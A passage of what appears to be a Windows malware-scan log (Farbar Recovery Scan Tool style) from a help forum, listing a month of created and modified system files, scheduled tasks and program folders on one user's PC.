2017-06-10 01:26 - 2017-06-10 01:26 - 00543648 _____ (Microsoft Corporation) C:\WINDOWS\system32\securekernel.exe
2017-06-10 01:26 - 2017-06-10 01:26 - 00527360 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00524800 _____ (Microsoft Corporation) C:\WINDOWS\system32\TileDataRepository.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00523296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppResolver.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00519680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00518144 _____ (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00510976 _____ (Microsoft Corporation) C:\WINDOWS\system32\TDLMigration.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00507392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00491520 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Display.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00476672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OneDriveSettingSyncProvider.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00476160 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Core.TextInput.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00457728 _____ (Microsoft Corporation) C:\WINDOWS\system32\webplatstorageserver.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00450048 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcdedit.exe
2017-06-10 01:26 - 2017-06-10 01:26 - 00444928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.System.Launcher.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00439808 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Midi.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00433664 _____ (Microsoft Corporation) C:\WINDOWS\system32\msIso.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00429568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv
2017-06-10 01:26 - 2017-06-10 01:26 - 00427008 _____ (Microsoft Corporation) C:\WINDOWS\system32\provengine.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00422400 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpAXHolder.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00417792 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgentUserBroker.exe
2017-06-10 01:26 - 2017-06-10 01:26 - 00414208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv.sys
2017-06-10 01:26 - 2017-06-10 01:26 - 00411040 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00409600 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00409504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2017-06-10 01:26 - 2017-06-10 01:26 - 00408064 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActivationManager.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00406528 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputSwitch.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00406064 _____ (Microsoft Corporation) C:\WINDOWS\system32\MMDevAPI.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00394240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DictationManager.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00392704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToManager.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00388000 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBXHCI.SYS
2017-06-10 01:26 - 2017-06-10 01:26 - 00387928 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpps.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00386560 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00374784 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
2017-06-10 01:26 - 2017-06-10 01:26 - 00370928 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsAdminFlows.exe
2017-06-10 01:26 - 2017-06-10 01:26 - 00368128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgentUserBroker.exe
2017-06-10 01:26 - 2017-06-10 01:26 - 00364032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msIso.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00363424 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\fastfat.sys
2017-06-10 01:26 - 2017-06-10 01:26 - 00362496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00361472 _____ (Microsoft Corporation) C:\WINDOWS\system32\ConhostV2.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00354400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MMDevAPI.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00354360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcryptprimitives.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00354304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputSwitch.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00354304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActivationManager.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00349600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00347136 _____ (Microsoft Corporation) C:\WINDOWS\system32\XpsDocumentTargetPrint.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00338432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00335808 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecurityHealthService.exe
2017-06-10 01:26 - 2017-06-10 01:26 - 00334336 _____ (Microsoft Corporation) C:\WINDOWS\system32\wc_storage.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00332800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Midi.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00329728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webplatstorageserver.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00329728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe
2017-06-10 01:26 - 2017-06-10 01:26 - 00315392 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationObjFactory.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00314880 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsEnvironment.Desktop.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00301056 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseAppMgmtSvc.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00299520 _____ (Microsoft Corporation) C:\WINDOWS\system32\AboveLockAppHost.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00296448 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudBackupSettings.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00287648 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sdbus.sys
2017-06-10 01:26 - 2017-06-10 01:26 - 00282112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VEEventDispatcher.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00280064 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiFiDisplay.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00277504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\xboxgip.sys
2017-06-10 01:26 - 2017-06-10 01:26 - 00274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtrans.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00266240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00257024 _____ (Microsoft Corporation) C:\WINDOWS\system32\webcheck.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00255904 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxAllUserStore.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00252928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XpsDocumentTargetPrint.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00251904 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Gaming.Preview.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00246272 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00233472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WiFiDisplay.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00232960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webcheck.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00232960 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmcsp.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00232448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudBackupSettings.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00232448 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.Diagnostics.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00224256 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
2017-06-10 01:26 - 2017-06-10 01:26 - 00218624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Streaming.ps.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00211872 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00209408 _____ (Microsoft Corporation) C:\WINDOWS\system32\smartscreenps.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00208896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.AppDefaults.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00203776 _____ (Microsoft Corporation) C:\WINDOWS\system32\PackageStateRoaming.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00199680 _____ (Microsoft Corporation) C:\WINDOWS\system32\RstrtMgr.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00192512 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.SharedPC.AccountManager.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00188824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dumpsd.sys
2017-06-10 01:26 - 2017-06-10 01:26 - 00181664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxAllUserStore.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PackageStateRoaming.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00174080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.Diagnostics.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00174080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\RstrtMgr.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00164864 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseModernAppMgmtCSP.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00159744 _____ (Microsoft Corporation) C:\WINDOWS\system32\NPSM.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00155136 _____ (Microsoft Corporation) C:\WINDOWS\system32\VEStoreEventHandlers.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00149504 _____ (Microsoft Corporation) C:\WINDOWS\system32\embeddedmodesvc.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00148480 _____ (Microsoft Corporation) C:\WINDOWS\system32\umpo.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00144288 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storahci.sys
2017-06-10 01:26 - 2017-06-10 01:26 - 00142240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wcifs.sys
2017-06-10 01:26 - 2017-06-10 01:26 - 00141824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\smartscreenps.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\iepeers.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00133120 _____ (Microsoft Corporation) C:\WINDOWS\system32\XblGameSaveExt.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00128000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NPSM.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00124928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iepeers.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00118784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\netvsc.sys
2017-06-10 01:26 - 2017-06-10 01:26 - 00112544 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dam.sys
2017-06-10 01:26 - 2017-06-10 01:26 - 00105456 _____ (Microsoft Corporation) C:\WINDOWS\system32\imagehlp.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00096256 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00095584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\imagehlp.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00091648 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmjpegdec.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00089088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00088576 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrvext.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00087552 _____ (Microsoft Corporation) C:\WINDOWS\system32\asycfilt.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00086016 _____ C:\WINDOWS\system32\xboxgipsynthetic.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\MshtmlDac.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00082944 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdc.ocx
2017-06-10 01:26 - 2017-06-10 01:26 - 00081408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmjpegdec.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00080384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00078848 _____ (Microsoft Corporation) C:\WINDOWS\system32\offreg.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00078336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\asycfilt.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00072192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdc.ocx
2017-06-10 01:26 - 2017-06-10 01:26 - 00061952 _____ (Microsoft Corporation) C:\WINDOWS\system32\vss_ps.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00059904 _____ C:\WINDOWS\SysWOW64\xboxgipsynthetic.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00057856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\offreg.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00056832 _____ (Microsoft Corporation) C:\WINDOWS\system32\cldapi.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00050176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cldapi.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00050176 _____ (Microsoft Corporation) C:\WINDOWS\system32\catsrvps.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00032004 _____ C:\WINDOWS\system32\edgehtmlpluginpolicy.bin
2017-06-10 01:26 - 2017-06-10 01:26 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\odbcconf.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00027136 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksthunk.sys
2017-06-10 01:26 - 2017-06-10 01:26 - 00027040 _____ (Microsoft Corporation) C:\WINDOWS\system32\browser_broker.exe
2017-06-10 01:26 - 2017-06-10 01:26 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\odbcconf.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00015872 _____ (Microsoft Corporation) C:\WINDOWS\system32\snmptrap.exe
2017-06-10 01:26 - 2017-06-10 01:26 - 00013312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rootmdm.sys
2017-06-10 01:17 - 2017-06-10 01:17 - 00008192 _____ C:\WINDOWS\system32\config\userdiff
2017-06-10 01:17 - 2017-06-09 21:37 - 00000000 ____D C:\WINDOWS\ServiceProfiles
2017-06-10 01:10 - 2017-06-10 01:10 - 00000000 ____D C:\Program Files\Reference Assemblies
2017-06-10 01:10 - 2017-06-10 01:10 - 00000000 ____D C:\Program Files\MSBuild
2017-06-10 01:10 - 2017-06-10 01:10 - 00000000 ____D C:\Program Files (x86)\Reference Assemblies
2017-06-10 01:10 - 2017-06-10 01:10 - 00000000 ____D C:\Program Files (x86)\MSBuild
2017-06-10 01:09 - 2017-06-10 01:09 - 01087488 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll
2017-06-10 01:09 - 2017-02-10 15:26 - 01166520 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationNative_v0300.dll
2017-06-10 01:09 - 2017-02-10 15:26 - 00124624 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationCFFRasterizerNative_v0300.dll
2017-06-10 01:09 - 2017-02-10 15:26 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\system32\TsWpfWrp.exe
2017-06-10 01:09 - 2017-02-10 15:21 - 00778936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationNative_v0300.dll
2017-06-10 01:09 - 2017-02-10 15:21 - 00103120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationCFFRasterizerNative_v0300.dll
2017-06-10 01:09 - 2017-02-10 15:21 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TsWpfWrp.exe
2017-06-09 22:14 - 2017-06-09 22:14 - 00000000 _SHDL C:\Users\Default\My Documents
2017-06-09 22:11 - 2017-06-09 22:13 - 00007623 _____ C:\WINDOWS\diagwrn.xml
2017-06-09 22:11 - 2017-06-09 22:13 - 00007623 _____ C:\WINDOWS\diagerr.xml
2017-06-09 22:03 - 2017-07-03 12:48 - 00004184 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{A704DC1E-F604-4563-996D-8EFD920B7276}
2017-06-09 22:03 - 2017-06-25 08:12 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-06-09 22:03 - 2017-06-21 17:23 - 00003310 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task v2
2017-06-09 22:03 - 2017-06-18 07:46 - 00003560 _____ C:\WINDOWS\System32\Tasks\PCDEventLauncherTask
2017-06-09 22:03 - 2017-06-09 22:04 - 00003810 _____ C:\WINDOWS\System32\Tasks\PCDoctorBackgroundMonitorTask
2017-06-09 22:03 - 2017-06-09 22:04 - 00003590 _____ C:\WINDOWS\System32\Tasks\{C1EFB248-7644-05E3-D1E7-66E55CB86A44}
2017-06-09 22:03 - 2017-06-09 22:04 - 00003590 _____ C:\WINDOWS\System32\Tasks\{49450373-FEEE-B4D8-F18A-86EC30A422FF}
2017-06-09 22:03 - 2017-06-09 22:04 - 00003344 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2017-06-09 22:03 - 2017-06-09 22:04 - 00003276 _____ C:\WINDOWS\System32\Tasks\Dell SupportAssistAgent AutoUpdate
2017-06-09 22:03 - 2017-06-09 22:04 - 00003094 _____ C:\WINDOWS\System32\Tasks\PCDDataUploadTask
2017-06-09 22:03 - 2017-06-09 22:04 - 00003080 _____ C:\WINDOWS\System32\Tasks\{A0D2D779-C325-C9CD-794C-617EE523AB5C}
2017-06-09 22:03 - 2017-06-09 22:03 - 00003448 _____ C:\WINDOWS\System32\Tasks\DropboxUpdateTaskMachineUA
2017-06-09 22:03 - 2017-06-09 22:03 - 00003224 _____ C:\WINDOWS\System32\Tasks\DropboxUpdateTaskMachineCore
2017-06-09 22:03 - 2017-06-09 22:03 - 00003120 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2017-06-09 22:03 - 2017-06-09 22:03 - 00002980 _____ C:\WINDOWS\System32\Tasks\SystemToolsDailyTest
2017-06-09 22:03 - 2017-06-09 22:03 - 00002304 _____ C:\WINDOWS\System32\Tasks\RtHDVBg_PushButton
2017-06-09 22:03 - 2017-06-09 22:03 - 00002262 _____ C:\WINDOWS\System32\Tasks\DropboxOEM
2017-06-09 22:02 - 2017-06-25 11:27 - 01077502 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-06-09 21:54 - 2017-06-09 21:54 - 00001576 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2017-06-09 21:48 - 2017-06-09 21:48 - 00000000 ____D C:\ProgramData\USOShared
2017-06-09 21:46 - 2017-06-09 21:55 - 00000000 ____D C:\WINDOWS\system32\config\bbimigrate
2017-06-09 21:43 - 2017-06-25 08:13 - 00000000 ____D C:\Users\Herbert Holland
2017-06-09 21:43 - 2017-06-09 21:43 - 00000000 _SHDL C:\Users\Herbert Holland\My Documents
2017-06-09 21:43 - 2017-06-09 21:43 - 00000000 _SHDL C:\Users\Herbert Holland\Documents\My Videos
2017-06-09 21:43 - 2017-06-09 21:43 - 00000000 _SHDL C:\Users\Herbert Holland\Documents\My Pictures
2017-06-09 21:43 - 2017-06-09 21:43 - 00000000 _SHDL C:\Users\Herbert Holland\Documents\My Music
2017-06-09 21:41 - 2017-06-25 08:13 - 00000180 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2017-06-09 21:41 - 2017-06-09 21:47 - 00000000 ____D C:\Program Files\Intel
2017-06-09 21:41 - 2017-06-09 21:41 - 00000200 _____ C:\WINDOWS\system32\{EC94D02F-D200-4428-9531-05AF7F9799CB}.bat
2017-06-09 21:41 - 2017-06-09 21:41 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_Kernel_SynTP_01011.Wdf
2017-06-09 21:41 - 2017-06-09 21:41 - 00000000 ____H C:\ProgramData\DP45977C.lfl
2017-06-09 21:41 - 2017-06-09 21:41 - 00000000 ____D C:\Program Files\Synaptics
2017-06-09 21:41 - 2015-09-09 17:25 - 00086528 _____ (Khronos Group) C:\WINDOWS\SysWOW64\OpenCL.DLL
2017-06-09 21:41 - 2015-09-09 17:25 - 00082432 _____ (Khronos Group) C:\WINDOWS\system32\OpenCL.DLL
2017-06-09 21:40 - 2017-06-09 21:40 - 00000000 ____D C:\WINDOWS\SysWOW64\RTCOM
2017-06-09 21:40 - 2017-06-09 21:40 - 00000000 ____D C:\WINDOWS\system32\SRSLabs
2017-06-09 21:40 - 2017-06-09 21:40 - 00000000 ____D C:\Program Files\Realtek
2017-06-09 21:40 - 2017-06-09 21:40 - 00000000 ____D C:\Program Files\Common Files\Atheros
2017-06-09 21:40 - 2017-03-18 16:56 - 02233344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll
2017-06-09 21:37 - 2017-07-03 12:44 - 00000000 ____D C:\WINDOWS\system32\SleepStudy
2017-06-09 21:37 - 2017-06-22 16:05 - 00380328 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2017-06-06 20:29 - 2017-06-06 20:29 - 00000044 _____ C:\Users\Herbert Holland\AppData\Roaming\WB.CFG
2017-06-05 20:20 - 2017-06-05 20:20 - 526396500 _____ C:\WINDOWS\MEMORY.DMP
2017-06-05 19:46 - 2017-06-22 18:28 - 00000000 ____D C:\Program Files\COMODO
2017-06-05 19:46 - 2017-06-10 07:03 - 00000258 __RSH C:\ProgramData\ntuser.pol
2017-06-05 19:46 - 2017-06-05 19:51 - 00000000 ____D C:\ProgramData\COMODO
2017-06-05 19:45 - 2017-06-22 18:28 - 00000000 ____D C:\ProgramData\e26b0e7f
2017-06-05 19:45 - 2017-06-05 19:52 - 00000000 ____D C:\ProgramData\{FA261CBF-4D8D-AB14-387A-85979BEA4BF2}
2017-06-05 19:45 - 2017-06-05 19:45 - 00000000 ____D C:\ProgramData\{6FCCF43A-D867-4391-5D6F-B12BEB126548}
2017-06-05 19:43 - 2017-06-22 16:37 - 00000000 ____D C:\Users\Herbert Holland\AppData\Local\Lavasoft
2017-06-05 19:42 - 2017-06-05 19:42 - 00000000 ____D C:\Users\Herbert Holland\AppData\Local\CrashRpt
2017-06-05 19:41 - 2017-06-22 16:37 - 00000000 ____D C:\ProgramData\Lavasoft
2017-06-05 19:41 - 2017-06-09 21:55 - 00000000 ____D C:\WINDOWS\SysWOW64\SSL
2017-06-05 19:41 - 2017-06-05 19:41 - 00000000 ____D C:\Program Files (x86)\Lavasoft
2017-06-05 19:39 - 2017-06-05 19:39 - 00807728 _____ (YoutubeDownloader.guru ) C:\Users\Herbert Holland\Downloads\FreeMusicDownloader_Setup.exe
2017-06-05 19:27 - 2017-06-05 19:27 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_User_WpdMtpDr_01_11_00.Wdf
2017-06-05 00:04 - 2017-06-05 00:04 - 00037169 _____ C:\WINDOWS\uninstaller.dat
2017-06-04 19:00 - 2017-06-10 07:04 - 00000000 ___DC C:\WINDOWS\Panther

 

[RichH]

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-07-03 12:57 - 2016-08-21 17:05 - 00002304 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2017-07-03 12:57 - 2016-08-21 17:05 - 00002292 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2017-07-03 12:50 - 2017-03-18 17:03 - 00000000 ___HD C:\Program Files\WindowsApps
2017-07-03 12:50 - 2017-03-18 17:03 - 00000000 ____D C:\WINDOWS\AppReadiness
2017-07-03 12:39 - 2017-03-18 17:01 - 00000000 ____D C:\WINDOWS\INF
2017-07-03 12:03 - 2016-11-18 10:36 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2017-06-25 08:13 - 2016-06-16 20:24 - 00000000 __SHD C:\Users\Herbert Holland\IntelGraphicsProfiles
2017-06-22 22:59 - 2017-03-18 07:40 - 00786432 _____ C:\WINDOWS\system32\config\BBI
2017-06-22 22:58 - 2016-04-12 16:28 - 00000000 ____D C:\Program Files\Dell
2017-06-22 22:53 - 2017-03-18 16:51 - 00000000 ____D C:\WINDOWS\CbsTemp
2017-06-22 22:23 - 2016-10-30 11:25 - 00000214 _____ C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job
2017-06-22 22:13 - 2017-02-16 23:07 - 00000000 ____D C:\Users\Herbert Holland\AppData\Local\ElevatedDiagnostics
2017-06-22 18:28 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\system32\Tasks_Migrated
2017-06-22 16:26 - 2016-11-18 09:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller
2017-06-22 16:13 - 2016-04-12 17:05 - 00000000 __RHD C:\Users\Public\AccountPictures
2017-06-22 16:03 - 2017-03-18 17:03 - 00000000 ____D C:\WINDOWS\system32\oobe
2017-06-22 16:03 - 2017-03-18 17:03 - 00000000 ____D C:\WINDOWS\system32\appraiser
2017-06-22 16:01 - 2016-06-16 20:29 - 00000000 ___RD C:\Users\Herbert Holland\OneDrive
2017-06-22 14:53 - 2017-03-18 17:03 - 00000000 ____D C:\WINDOWS\LiveKernelReports
2017-06-21 17:23 - 2016-08-21 16:42 - 00002395 _____ C:\Users\Herbert Holland\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2017-06-20 04:03 - 2016-04-12 16:50 - 00000000 ____D C:\Program Files (x86)\Microsoft Office
2017-06-18 08:50 - 2016-08-21 20:29 - 00000000 ____D C:\WINDOWS\system32\MRT
2017-06-18 08:43 - 2016-08-21 20:29 - 133627792 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2017-06-18 08:06 - 2017-03-18 17:03 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2017-06-17 09:45 - 2016-09-02 17:04 - 00000000 ____D C:\Users\Herbert Holland\AppData\Local\ConnectedDevicesPlatform
2017-06-13 14:09 - 2017-03-18 17:03 - 00000000 ____D C:\WINDOWS\appcompat
2017-06-10 07:24 - 2016-08-21 16:37 - 00000000 ____D C:\Users\Herbert Holland\AppData\Local\Packages
